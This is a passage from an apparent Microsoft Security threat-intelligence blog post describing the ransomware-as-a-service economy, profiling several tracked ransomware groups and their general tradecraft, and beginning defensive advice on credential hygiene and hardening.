attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure 